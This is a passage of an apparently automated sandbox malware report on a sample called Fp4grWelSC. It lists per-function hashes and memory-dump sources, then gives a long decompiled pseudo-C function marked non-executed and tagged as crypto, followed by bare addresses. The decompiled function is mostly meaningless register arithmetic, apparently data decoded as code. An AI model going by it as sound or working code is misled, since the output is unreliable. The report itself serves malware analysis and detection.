                                    • Opcode Fuzzy Hash: 7767b987ea3db680c0edc82855215ff77ee851308bbd899f1b8f69895bb74960
                                    • Instruction Fuzzy Hash: 9311B1B6404280CFCB11CF14D9C4B16BF71FB84324F24C6ADD8490B656C336D95ACBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00CDD1CF, Relevance: .1, Instructions: 53COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688720814.0000000000CDD000.00000040.00000001.sdmp, Offset: 00CDD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_cdd000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a4a6d69dcac19fdb8a3552707fc77d34c4a78638005edc64a4181cec70993955
                                    • Instruction ID: 98e74076d723d4fa1ad41ecc0cf662028547a047f972436e98558e97dc47d9e7
                                    • Opcode Fuzzy Hash: a4a6d69dcac19fdb8a3552707fc77d34c4a78638005edc64a4181cec70993955
                                    • Instruction Fuzzy Hash: 6E118B75904280DFCB11DF14D5C4B15FBB1FB84324F28C6AAD94A4B756C33AD94ACB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00CCD745, Relevance: .0, Instructions: 45COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688676542.0000000000CCD000.00000040.00000001.sdmp, Offset: 00CCD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ccd000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0281378057ff61f334dcb6eb8f71dc61029f78bf91f3681e1766327359f42ed4
                                    • Instruction ID: 52717153c5c9cbcced0492250710887c3ad41f81ec8c0667953478e4c963b1cb
                                    • Opcode Fuzzy Hash: 0281378057ff61f334dcb6eb8f71dc61029f78bf91f3681e1766327359f42ed4
                                    • Instruction Fuzzy Hash: BC014771008740AAE7208A22CC84F67BB98DF41324F18C56EE91A4B24AD7789884CBB1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00CCD744, Relevance: .0, Instructions: 36COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688676542.0000000000CCD000.00000040.00000001.sdmp, Offset: 00CCD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ccd000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b51182e664e994bedb2e2673f7447044725a99894066397487dcdfbdbac4d401
                                    • Instruction ID: 98b12e680492d171ae0a967273638259734bd1f645e45d6ce2bc6861f95bea45
                                    • Opcode Fuzzy Hash: b51182e664e994bedb2e2673f7447044725a99894066397487dcdfbdbac4d401
                                    • Instruction Fuzzy Hash: 17F06271404344AEEB108E16DDC8B62FFA8EB41774F18C56AED195B68AC3799C84CBB1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 00372050, Relevance: 1.7, Instructions: 1749COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E00372050(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, intOrPtr* __esi) {
				signed char _t234;
				intOrPtr* _t235;
				signed char _t237;
				intOrPtr* _t238;
				signed char _t240;
				intOrPtr* _t241;
				signed char _t243;
				intOrPtr* _t244;
				signed char _t246;
				signed int _t247;
				signed char _t250;
				signed char _t251;
				signed char _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed char _t256;
				signed int _t258;
				signed char _t260;
				signed int _t261;
				signed char _t263;
				signed char _t264;
				signed char _t269;
				signed char _t270;
				signed char _t272;
				signed char _t273;
				intOrPtr* _t274;
				signed char _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				signed char _t283;
				signed char _t285;
				signed int* _t286;
				signed char _t291;
				signed char _t293;
				signed char _t294;
				signed char _t525;
				signed int _t528;
				signed int _t530;
				signed int _t531;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed char _t538;
				intOrPtr* _t539;
				signed char _t546;
				signed char _t547;
				signed int* _t548;
				signed char _t549;
				void* _t550;
				intOrPtr* _t551;
				signed char _t604;
				signed char _t605;
				signed char _t606;
				signed int* _t608;
				signed char _t609;
				signed char _t610;
				char* _t611;
				signed char _t612;
				signed char _t613;
				char* _t641;
				signed char _t649;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed char _t656;
				signed char _t657;
				signed char _t658;
				signed char _t659;
				signed char _t660;
				signed char _t661;
				signed int _t676;
				signed int _t677;
				intOrPtr* _t678;
				signed int* _t679;
				signed int _t681;
				signed int* _t682;
				intOrPtr* _t684;
				void* _t685;
				void* _t686;
				void* _t687;
				signed int _t688;
				void* _t697;

				_push(ds);
				 *__eax =  *__eax + __eax;
				_t234 = __eax + 0x0000002a &  *__edx;
				 *_t234 =  *_t234 + _t234;
				_t235 = _t234 + 0x2a;
				_push(ds);
				 *_t235 =  *_t235 + _t235;
				_t237 = _t235 + 0x0000002a &  *__edx;
				 *_t237 =  *_t237 + _t237;
				_t238 = _t237 + 0x2a;
				_push(ds);
				 *_t238 =  *_t238 + _t238;
				_t240 = _t238 + 0x0000002a &  *__edx;
				 *_t240 =  *_t240 + _t240;
				_t241 = _t240 + 0x2a;
				_push(ds);
				 *_t241 =  *_t241 + _t241;
				_t243 = _t241 + 0x0000002a &  *__edx;
				 *_t243 =  *_t243 + _t243;
				_t244 = _t243 + 0x2a;
				_push(ds);
				_t546 = __ebx +  *((intOrPtr*)(__ebx + 1)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) + 2)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) + 2)) + 3)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) + 2)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) + 2)) + 3)) + 4)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) + 2)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) + 2)) + 3)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) + 2)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) +  *((intOrPtr*)(__ebx +  *((intOrPtr*)(__ebx + 1)) + 2)) + 3)) + 4)) + 5));
				 *_t244 =  *_t244 + _t244;
				_t246 = _t244 + 0x0000002a &  *__edx;
				_t676 = __edi +  *((intOrPtr*)(_t684 + 1)) +  *((intOrPtr*)(_t684 + 2)) +  *((intOrPtr*)(_t684 + 3)) +  *((intOrPtr*)(_t684 + 4)) +  *((intOrPtr*)(_t684 + 5));
				 *_t246 =  *_t246 + _t246;
				_t247 = _t246 + 0x2a;
				 *_t247 =  *_t247 + _t247;
				 *_t546 =  *_t546 + __edx;
				 *(_t247 + _t247) =  *(_t247 + _t247) ^ _t247;
				_t681 = _t247;
				 *__esi =  *__esi + __esi;
				 *__ecx =  *__ecx + __esi;
				 *__esi =  *__esi + __esi;
				asm("adc [eax], eax");
				_t604 = __ecx +  *__esi;
				asm("adc al, [ecx]");
				 *0x2d0a0000 =  *0x2d0a0000 - __edx;
				_t250 = __esi + 0x0b060000 &  *__edx;
				 *_t676 =  *_t676 - _t250;
				 *_t250 =  *_t250 + _t250;
				_push(es);
				 *_t250 =  *_t250 + _t684;
				asm("adc eax, 0x2d0a0000");
				asm("adc eax, [edx]");
				 *_t604 =  *_t604 - _t604;
				 *_t250 =  *_t250 + _t250;
				_push(es);
				_t653 = __edx |  *__edx |  *(__edx |  *__edx);
				 *_t250 =  *_t250 + _t684;
				asm("adc eax, 0x390a0000");
				_t251 = _t546;
				_t547 = _t250;
				 *_t251 =  *_t251 + _t251;
				 *((intOrPtr*)(_t653 + 1)) =  *((intOrPtr*)(_t653 + 1)) + _t653;
				 *_t251 =  *_t251 + _t251;
				if( *_t251 >= 0) {
					 *0xb060000 =  *0xb060000 - _t251;
				}
				 *_t251 =  *_t251 + _t251;
				_t654 = _t653 |  *_t653;
				 *_t251 =  *_t251 + _t684;
				asm("adc eax, 0x2d0a0000");
				es = es;
				if( *_t251 > 0) {
					 *_t251 =  *_t251 + _t251;
					_push(ss);
					_t649 = (_t604 |  *_t547) +  *_t251;
					_t251 = _t251 + 0xb060000;
					asm("adc al, [ecx]");
					 *_t676 =  *_t676 - _t654;
					 *_t251 =  *_t251 + _t251;
					_t604 = (_t649 |  *(_t654 + _t654)) +  *_t251;
				}
				 *_t251 =  *_t251 - _t547;
				 *_t251 =  *_t251 + _t251;
				_t252 = _t251 |  *_t654;
				 *_t676 =  *_t676 - _t252;
				 *_t252 =  *_t252 + _t252;
				_t655 = _t654 |  *_t654;
				 *_t252 =  *_t252 + _t684;
				asm("adc eax, 0x2d0a0000");
				es = es;
				if( *_t252 > 0) {
					 *_t252 =  *_t252 + _t252;
					es = ss;
					 *_t252 =  *_t252 + _t252;
					_t655 = _t655 |  *_t655;
					 *_t252 =  *_t252 + _t684;
					ss = es;
					 *_t252 =  *_t252 + _t252;
					_t604 = ((_t604 |  *_t547) +  *_t252 |  *(_t655 + _t655)) +  *_t252;
				}
				 *_t252 =  *_t252 - _t547;
				 *_t252 =  *_t252 + _t252;
				_t253 = _t252 |  *_t655;
				 *_t604 =  *_t604 - _t604;
				 *_t253 =  *_t253 + _t253;
				_t656 = _t655 |  *_t655;
				 *_t253 =  *_t253 + _t684;
				asm("adc eax, 0x2d0a0000");
				es = es;
				if( *_t253 > 0) {
					 *_t253 =  *_t253 + _t253;
					 *_t253 =  *_t253 | _t253;
					 *_t681 =  *_t681 + _t253;
					_t656 = _t656 |  *_t656;
					 *_t253 =  *_t253 + _t684;
					ss = ss;
					 *_t253 =  *_t253 + _t253;
					_t604 = ((_t604 |  *_t547) +  *_t253 |  *(_t656 + _t656)) +  *_t253;
				}
				 *_t253 =  *_t253 - _t547;
				 *_t253 =  *_t253 + _t253;
				_t605 = _t604 |  *_t253;
				asm("sbb [eax], eax");
				 *_t656 =  *_t656 + _t605;
				_t254 = _t253 -  *0x167e;
				_t606 = _t605 |  *_t656;
				_push(es);
				 *_t656 =  *_t656 - _t547;
				 *_t254 =  *_t254 + _t254;
				_t657 = _t656 |  *_t681;
				 *_t606 =  *_t606 + 1;
				_t255 = _t254 | 0x720c2c09;
				asm("sbb [eax], eax");
				 *((intOrPtr*)(_t255 + 6)) =  *((intOrPtr*)(_t255 + 6)) + _t657;
				 *_t547 =  *_t547 - _t547;
				 *_t255 =  *_t255 + _t255;
				_t608 = (_t606 |  *_t657) +  *_t255;
				 *_t255 =  *_t255 + _t255;
				 *_t681 =  *_t681 + _t255;
				asm("adc eax, [0x4130511]");
				asm("adc [eax*2+0x8], eax");
				_t256 = _t255 +  *_t255;
				 *_t256 =  *_t256 + _t256;
				asm("adc [eax], eax");
				 *_t256 =  *_t256 + _t256;
				 *_t256 =  *_t256 & _t256;
				 *_t256 =  *_t256 + _t256;
				asm("das");
				while(1) {
					L9:
					 *_t256 =  *_t256 + _t256;
					 *_t681 =  *_t681 + _t547;
					 *_t256 =  *_t256 + _t256;
					 *_t684 =  *_t684 + _t608;
					 *_t256 =  *_t256 + _t256;
					 *_t256 =  *_t256 + _t256;
					 *_t547 = _t608 +  *_t547;
					 *_t256 =  *_t256 + _t256;
					_t681 = _t681 -  *((intOrPtr*)(_t657 + 0x72));
					 *_t256 =  *_t256 ^ _t256;
					 *((intOrPtr*)(_t256 + 6)) =  *((intOrPtr*)(_t256 + 6)) + _t657;
					 *_t547 =  *_t547 - _t547;
					 *_t256 =  *_t256 + _t256;
					_t658 = _t657 |  *_t547;
					_push(es);
					_t685 = _t684 - _t608[0x1c];
					asm("sbb eax, [eax]");
					 *_t658 =  *_t658 + _t608;
					asm("adc eax, [esi]");
					_t548 = _t547 -  *((intOrPtr*)(_t658 + 0x72));
					_t258 = _t676;
					_t677 =  *_t256 * 0x28067000;
					 *_t258 =  *_t258 + _t258;
					if( *_t258 >= 0) {
						 *_t548 =  *_t548 - _t548;
						 *_t258 =  *_t258 + _t258;
						_t658 = _t658 |  *_t548;
					}
					_push(es);
					_t608 = _t608 - _t548[0x1c];
					while(1) {
						_t697 = _t685;
						_pop(_t686);
						 *_t258 =  *_t258 + _t258;
						if( *_t258 >= 0) {
							 *_t547 =  *_t547 - _t547;
							 *_t258 =  *_t258 + _t258;
							_t658 = _t657 |  *_t547;
						}
						_push(es);
						_t676 = _t677 -  *((intOrPtr*)(_t658 + _t681 * 2));
						_t256 = _t258 +  *_t608;
						 *((intOrPtr*)(_t256 + 6)) =  *((intOrPtr*)(_t256 + 6)) + _t658;
						 *_t548 =  *_t548 - _t548;
						 *_t256 =  *_t256 + _t256;
						_t657 = _t658 |  *_t548;
						_push(es);
						_t684 = _t686 -  *0x14772;
						if(_t684 >= 0) {
							 *_t548 =  *_t548 - _t548;
							 *_t256 =  *_t256 + _t256;
							_t657 = _t657 |  *_t548;
						}
						_push(es);
						_t547 = _t548 -  *_t681;
						if(_t547 < 0) {
							goto L9;
						}
						 *_t256 =  *_t256 + _t256;
						if( *_t256 >= 0) {
							 *_t547 =  *_t547 - _t547;
							 *_t256 =  *_t256 + _t256;
							_t658 = _t657 |  *_t547;
						}
						_push(es);
						_t608 = _t608 -  *_t676;
						if(_t608 < 0) {
							continue;
						}
						 *_t256 =  *_t256 + _t256;
						if( *_t256 < 0) {
							L23:
							 *_t256 =  *_t256 + _t256;
							 *_t657 =  *_t657 + _t256;
							 *_t256 =  *_t256 + _t256;
							asm("adc [eax], eax");
							asm("adc al, 0xb");
							_pop(es);
							_t260 = _t256 -  *_t256 -  *((intOrPtr*)(_t256 -  *_t256));
						} else {
							_push(es);
							_t260 = _t256 -  *_t681;
							if(_t260 < 0) {
								 *_t260 =  *_t260 + _t260;
								_t547 = _t547 |  *(_t657 + 0x11);
								_push(es);
								_t256 = _t260 -  *_t260;
								 *_t547 =  *_t547 + _t657;
								 *_t608 =  *_t608 ^ _t256;
								 *_t676 =  *_t676 + _t256;
								goto L23;
							}
						}
						 *_t547 =  *_t547 + _t657;
						 *_t608 =  *_t608 ^ _t260;
						 *_t657 =  *_t657 + _t547;
						 *_t260 =  *_t260 + _t260;
						_t261 = _t260 +  *_t260;
						 *_t608 =  *_t608 + _t657;
						 *_t657 =  *_t657 + _t261;
						 *_t608 =  *_t608 - _t261;
						 *_t261 =  *_t261 + _t261;
						_push(es);
						_t263 = _t261 |  *_t676 |  *_t681;
						_t687 = _t684 + 1;
						 *_t263 =  *_t263 | _t263;
						 *_t263 =  *_t263 + _t263;
						_t264 = _t263 +  *_t263;
						 *_t264 =  *_t264 + _t264;
						_push(es);
						 *_t264 =  *_t264 + _t264;
						 *_t657 = _t608 +  *_t657;
						 *_t264 =  *_t264 + _t264;
						 *_t681 = _t608 +  *_t681;
						 *_t264 =  *_t264 + _t264;
						 *_t657 =  *_t657 + _t657;
						 *_t264 =  *_t264 + _t264;
						 *_t681 =  *_t681 + _t657;
						 *_t264 =  *_t264 + _t264;
						 *_t657 =  *_t657 + _t547;
						 *_t264 =  *_t264 + _t264;
						 *_t681 =  *_t681 + _t547;
						 *_t264 =  *_t264 + _t264;
						 *_t547 = _t608 +  *_t547;
						 *_t264 =  *_t264 & _t547;
						_t549 = _t547 &  *_t608;
						_push(ds);
						asm("sbb [ebx+ebp], ecx");
						asm("sbb dl, [edi]");
						_push(ss);
						asm("sbb [ebx+ebp], cl");
						asm("adc bl, [eax]");
						_push(cs);
						asm("sbb [ebx+ebp], cl");
						_t659 = _t657 |  *_t681;
						_t269 = _t264 | 0x2b;
						_push(es);
						if(_t269 < 0) {
							 *_t269 =  *_t269 + _t269;
							_t549 = _t549 |  *(_t659 + 8);
							_t539 = _t269 -  *_t659;
							_t608 = _t608 +  *_t539;
							asm("sbb eax, 0xa0000");
							asm("adc esi, [eax]");
							_t269 = _t539 -  *_t539;
							asm("pushad");
							 *_t269 =  *_t269 + _t269;
							 *((intOrPtr*)(_t269 + _t269)) =  *((intOrPtr*)(_t269 + _t269)) + _t269;
							 *_t608 =  *_t608 + _t659;
						}
						_t660 = _t659 +  *((intOrPtr*)(0x4000012 + _t676 * 2));
						_t609 = _t608 +  *_t269;
						_push(ds);
						 *_t269 =  *_t269 + _t269;
						_t270 = _t269 |  *_t269;
						 *_t660 =  *_t660 + _t270;
						_t678 = _t676 +  *((intOrPtr*)(_t687 + 0x10));
						 *_t270 =  *_t270 + _t270;
						_t272 = _t270 + 0x7f;
						asm("adc [eax], eax");
						 *((intOrPtr*)(_t660 + _t272)) =  *((intOrPtr*)(_t660 + _t272)) + _t272;
						 *_t609 =  *_t609 - _t272;
						 *_t272 =  *_t272 + _t272;
						_push(es);
						 *_t681 =  *_t681 + _t660;
						_t610 = _t609 |  *_t549;
						_t273 = _t272 &  *_t660;
						if(_t273 == 0) {
							 *_t273 =  *_t273 + _t273;
							_t535 = _t273 + 0x6f;
							_pop(ds);
							 *_t535 =  *_t535 + _t535;
							_t660 = _t660 |  *(_t549 + 0xe);
							 *_t535 =  *_t535 + _t535;
							_t536 = _t535 & 0x00026f06;
							 *_t681 =  *_t681 + _t536;
							 *((intOrPtr*)(_t678 + 0x20)) =  *((intOrPtr*)(_t678 + 0x20)) + _t610;
							 *_t536 =  *_t536 + _t536;
							ss = es;
							_t538 = es;
							_t273 = _t538 |  *_t681;
							 *((char*)(_t549 + _t610)) =  *((char*)(_t549 + _t610)) + 1;
							es = ds;
						}
						_t274 = _t273 - 0x257b02d6;
						 *_t274 =  *_t274 + _t274;
						_t275 = _t274 + 0x16;
						asm("outsd");
						 *_t275 =  *_t275 & _t275;
						 *_t660 =  *_t660 + _t610;
						 *_t660 =  *_t660 + _t610;
						_t682 = _t681 - 1;
						 *_t660 =  *_t660 + _t275;
						if( *_t660 != 0) {
							L32:
							_t276 = _t275 & 0x00000000;
							 *_t660 =  *_t660 + _t610;
							if( *_t660 != 0) {
								 *_t276 =  *_t276 + _t276;
							}
							_t610 = _t610 +  *((intOrPtr*)(_t678 + 0xd));
							 *_t276 =  *_t276 + _t276;
							_push(es);
							 *_t660 =  *_t660 - _t660;
							 *_t276 =  *_t276 + _t276;
							_push(es);
							 *_t660 =  *_t660 + _t610;
							 *_t549 =  *_t549 + _t660;
							 *0x8200 =  *0x8200 ^ _t276;
							 *0x110000 =  *0x110000 + _t276;
						} else {
							 *_t275 =  *_t275 + _t275;
							 *_t660 =  *_t660 + _t610;
							asm("outsd");
							_t534 = _t275 + 0x0000006f &  *(_t275 + 0x6f) &  *(_t275 + 0x0000006f &  *(_t275 + 0x6f));
							 *_t660 =  *_t660 + _t610;
							 *_t660 =  *_t660 + _t610;
							if ( *_t660 != 0) goto L30;
							_t276 = _t534 +  *_t660;
							if(_t276 == 0) {
								 *_t276 =  *_t276 + _t276;
								_t275 = _t276 + 0x6f;
								goto L32;
							}
						}
						asm("adc [eax], eax");
						_t550 = _t549 +  *((intOrPtr*)(_t549 + 0x22));
						 *_t276 =  *_t276 + _t276;
						_t277 = _t276 + 2;
						if(_t277 != 0) {
							L38:
							_t550 = _t550 +  *((intOrPtr*)(_t610 + 0xa));
							_push(es);
							_push(ss);
							 *_t610 =  *_t610 + 1;
						} else {
							 *_t277 =  *_t277 + _t277;
							_t277 = _t277 + 2;
							if(_t277 == 0) {
								 *_t277 =  *_t277 + _t277;
								_t530 = _t277 + 0x00000017 & 0x00256f0c;
								 *_t660 =  *_t660 + _t610;
								 *_t530 =  *_t530 + _t610;
								_t531 = _t530 & 0x00256f0b;
								 *_t660 =  *_t660 + _t610;
								 *_t678 =  *_t678 + _t531;
								asm("outsd");
								_t277 = _t531 & 0x000a0000;
								asm("sbb [ebx], eax");
								goto L38;
							}
						}
						_t278 = _t277 | 0x2b022c09;
						_t679 = _t678 + 1;
						_t551 = _t550 +  *((intOrPtr*)(_t550 + 0x22));
						 *_t278 =  *_t278 + _t278;
						asm("outsd");
						ss = es;
						_pop(_t611);
						_push(ss);
						 *_t611 =  *_t611 + 1;
						asm("adc eax, [ecx+edx]");
						_t612 = _t611 +  *_t551;
						_t283 = (_t278 + 0x00000016 & 0x000a0000 |  *_t682) + 0x2c -  *_t660;
						if(_t283 == 0) {
							 *_t283 =  *_t283 + _t283;
							asm("outsd");
							ss = es;
							_pop(_t641);
							_t528 = _t283 + 0x00000016 & 0x000a0000 |  *_t682;
							_push(ss);
							 *_t641 =  *_t641 + 1;
							asm("adc eax, [0x22c0511]");
							_t612 = _t641 -  *0x247b02;
							 *((intOrPtr*)(_t682 + _t660)) =  *((intOrPtr*)(_t682 + _t660)) + _t528;
							asm("outsd");
							_t283 = _t528 & 0x000a0000;
						}
						 *_t283 =  *_t283 + _t283;
						_t285 = (_t283 |  *_t283) -  *(_t283 |  *_t283);
						 *_t551 =  *_t551 + _t660;
						 *_t660 =  *_t660 ^ _t285;
						 *_t682 =  *_t682 + _t612;
						 *_t285 =  *_t285 + _t285;
						 *_t682 =  *_t682 + _t285;
						 *_t285 =  *_t285 + _t285;
						asm("adc [eax], eax");
						_t688 = _t687 +  *_t285;
						asm("sbb al, [eax]");
						 *_t660 =  *_t660 + _t612;
						_t286 = _t285 - 0x266f030d;
						 *_t286 = _t286 +  *_t286;
						_t613 = _t612 |  *_t286;
						asm("sbb al, [eax]");
						 *_t660 =  *_t660 + _t613;
						_pop(ss);
						_push(ss);
						_t291 = (_t286 -  *_t613 |  *_t679) - 0x00000004 | 0x2800122b;
						asm("daa");
						 *_t291 =  *_t291 + _t291;
						_push(es);
						_t293 = _t291 |  *_t682 | 0x0000002b;
						 *_t293 =  *_t293 + _t613;
						_t294 = _t293 -  *_t293;
						 *_t551 =  *_t551 + _t660;
						 *0x10500 =  *0x10500 ^ _t294;
						 *_t679 =  *_t679 + _t294;
						 *_t294 =  *_t294 + _t294;
						asm("adc [eax], eax");
						if( *_t294 < 0) {
							 *_t294 =  *_t294 + _t294;
							_push(es);
							_t525 = _t294 & 0x00257b02;
							 *((intOrPtr*)(_t679 + _t688 * 2)) =  *((intOrPtr*)(_t679 + _t688 * 2)) + _t525;
							_t294 = _t525 & 0x00000000;
							 *_t660 =  *_t660 + _t613;
						}
						_t661 = _t660 |  *(_t660 + _t294);
					}
				}
			}























































































                                    0x00372050
                                    0x00372054
                                    0x00372058
                                    0x0037205d
                                    0x0037205f
                                    0x00372061
                                    0x00372065
                                    0x00372069
                                    0x0037206e
                                    0x00372070
                                    0x00372072
                                    0x00372076
                                    0x0037207a
                                    0x0037207f
                                    0x00372081
                                    0x00372083
                                    0x00372087
                                    0x0037208b
                                    0x00372090
                                    0x00372092
                                    0x00372094
                                    0x00372095
                                    0x00372098
                                    0x0037209c
                                    0x0037209e
                                    0x003720a1
                                    0x003720a3
                                    0x003720a5
                                    0x003720a7
                                    0x003720a9
                                    0x003720ac
                                    0x003720ad
                                    0x003720af
                                    0x003720b1
                                    0x003720b3
                                    0x003720b5
                                    0x003720bc
                                    0x003720be
                                    0x003720c4
                                    0x003720c6
                                    0x003720c8
                                    0x003720ca
                                    0x003720cd
                                    0x003720cf
                                    0x003720d4
                                    0x003720d6
                                    0x003720d8
                                    0x003720da
                                    0x003720db
                                    0x003720dd
                                    0x003720df
                                    0x003720e4
                                    0x003720e4
                                    0x003720e5
                                    0x003720e7
                                    0x003720ea
                                    0x003720ec
                                    0x003720ee
                                    0x003720ee
                                    0x003720f0
                                    0x003720f3
                                    0x003720f5
                                    0x003720f7
                                    0x003720fc
                                    0x003720fd
                                    0x003720ff
                                    0x00372103
                                    0x00372104
                                    0x00372106
                                    0x0037210b
                                    0x0037210d
                                    0x0037210f
                                    0x00372114
                                    0x00372114
                                    0x00372115
                                    0x00372117
                                    0x00372119
                                    0x0037211b
                                    0x0037211d
                                    0x00372120
                                    0x00372122
                                    0x00372124
                                    0x00372129
                                    0x0037212a
                                    0x0037212c
                                    0x00372133
                                    0x00372134
                                    0x00372137
                                    0x00372139
                                    0x0037213b
                                    0x0037213c
                                    0x00372141
                                    0x00372141
                                    0x00372142
                                    0x00372144
                                    0x00372146
                                    0x00372148
                                    0x0037214a
                                    0x0037214d
                                    0x0037214f
                                    0x00372151
                                    0x00372156
                                    0x00372157
                                    0x00372159
                                    0x00372160
                                    0x00372162
                                    0x00372164
                                    0x00372166
                                    0x00372168
                                    0x00372169
                                    0x0037216e
                                    0x0037216e
                                    0x0037216f
                                    0x00372171
                                    0x00372173
                                    0x00372175
                                    0x00372177
                                    0x00372179
                                    0x0037217f
                                    0x00372181
                                    0x00372182
                                    0x00372184
                                    0x00372186
                                    0x00372188
                                    0x0037218a
                                    0x0037218f
                                    0x00372191
                                    0x00372194
                                    0x00372196
                                    0x0037219a
                                    0x0037219c
                                    0x0037219e
                                    0x003721a0
                                    0x003721a6
                                    0x003721ad
                                    0x003721af
                                    0x003721b1
                                    0x003721b3
                                    0x003721b5
                                    0x003721b7
                                    0x003721b9
                                    0x003721ba
                                    0x003721ba
                                    0x003721ba
                                    0x003721bc
                                    0x003721be
                                    0x003721c0
                                    0x003721c3
                                    0x003721c6
                                    0x003721c8
                                    0x003721cb
                                    0x003721cd
                                    0x003721d0
                                    0x003721d2
                                    0x003721d5
                                    0x003721d7
                                    0x003721d9
                                    0x003721db
                                    0x003721dc
                                    0x003721e5
                                    0x003721e7
                                    0x003721e9
                                    0x003721eb
                                    0x003721ee
                                    0x003721ee
                                    0x003721ef
                                    0x003721f1
                                    0x003721f3
                                    0x003721f5
                                    0x003721f7
                                    0x003721f7
                                    0x003721f9
                                    0x003721fa
                                    0x003721fd
                                    0x003721fd
                                    0x003721fd
                                    0x003721fe
                                    0x00372200
                                    0x00372202
                                    0x00372204
                                    0x00372206
                                    0x00372206
                                    0x00372208
                                    0x00372209
                                    0x0037220c
                                    0x0037220e
                                    0x00372211
                                    0x00372213
                                    0x00372215
                                    0x00372217
                                    0x00372218
                                    0x0037221e
                                    0x00372220
                                    0x00372222
                                    0x00372224
                                    0x00372224
                                    0x00372226
                                    0x00372227
                                    0x00372229
                                    0x00000000
                                    0x00000000
                                    0x0037222b
                                    0x0037222d
                                    0x0037222f
                                    0x00372231
                                    0x00372233
                                    0x00372233
                                    0x00372235
                                    0x00372236
                                    0x00372238
                                    0x00000000
                                    0x00000000
                                    0x0037223a
                                    0x0037223c
                                    0x00372251
                                    0x00372251
                                    0x00372253
                                    0x00372255
                                    0x00372257
                                    0x00372259
                                    0x0037225d
                                    0x0037225e
                                    0x0037223e
                                    0x0037223e
                                    0x0037223f
                                    0x00372241
                                    0x00372243
                                    0x00372245
                                    0x00372248
                                    0x00372249
                                    0x0037224b
                                    0x0037224d
                                    0x0037224f
                                    0x00000000
                                    0x0037224f
                                    0x00372241
                                    0x0037225f
                                    0x00372261
                                    0x00372263
                                    0x00372266
                                    0x00372268
                                    0x0037226a
                                    0x0037226c
                                    0x0037226e
                                    0x00372270
                                    0x00372272
                                    0x00372275
                                    0x00372277
                                    0x00372278
                                    0x0037227a
                                    0x0037227c
                                    0x0037227e
                                    0x00372280
                                    0x00372281
                                    0x00372283
                                    0x00372285
                                    0x00372287
                                    0x00372289
                                    0x0037228b
                                    0x0037228d
                                    0x0037228f
                                    0x00372291
                                    0x00372293
                                    0x00372295
                                    0x00372297
                                    0x00372299
                                    0x0037229b
                                    0x0037229d
                                    0x003722a1
                                    0x003722a5
                                    0x003722a6
                                    0x003722a9
                                    0x003722ad
                                    0x003722ae
                                    0x003722b1
                                    0x003722b5
                                    0x003722b6
                                    0x003722b9
                                    0x003722bb
                                    0x003722bd
                                    0x003722be
                                    0x003722c0
                                    0x003722c2
                                    0x003722c5
                                    0x003722c7
                                    0x003722c9
                                    0x003722d0
                                    0x003722d2
                                    0x003722d4
                                    0x003722d5
                                    0x003722d7
                                    0x003722da
                                    0x003722da
                                    0x003722dc
                                    0x003722e3
                                    0x003722e5
                                    0x003722e6
                                    0x003722e8
                                    0x003722ea
                                    0x003722ec
                                    0x003722ef
                                    0x003722f3
                                    0x003722f5
                                    0x003722f7
                                    0x003722fa
                                    0x003722fc
                                    0x003722fe
                                    0x003722ff
                                    0x00372301
                                    0x00372303
                                    0x00372305
                                    0x00372307
                                    0x00372309
                                    0x0037230b
                                    0x0037230c
                                    0x0037230e
                                    0x00372311
                                    0x00372314
                                    0x00372319
                                    0x0037231b
                                    0x0037231e
                                    0x00372323
                                    0x00372324
                                    0x00372325
                                    0x00372328
                                    0x0037232b
                                    0x0037232b
                                    0x0037232c
                                    0x00372331
                                    0x00372333
                                    0x00372335
                                    0x00372336
                                    0x00372338
                                    0x0037233a
                                    0x0037233c
                                    0x0037233d
                                    0x0037233f
                                    0x0037235a
                                    0x0037235a
                                    0x0037235c
                                    0x0037235e
                                    0x00372360
                                    0x00372360
                                    0x00372362
                                    0x00372365
                                    0x00372367
                                    0x00372368
                                    0x0037236a
                                    0x0037236c
                                    0x0037236d
                                    0x0037236f
                                    0x00372371
                                    0x00372377
                                    0x00372341
                                    0x00372341
                                    0x00372347
                                    0x00372349
                                    0x0037234a
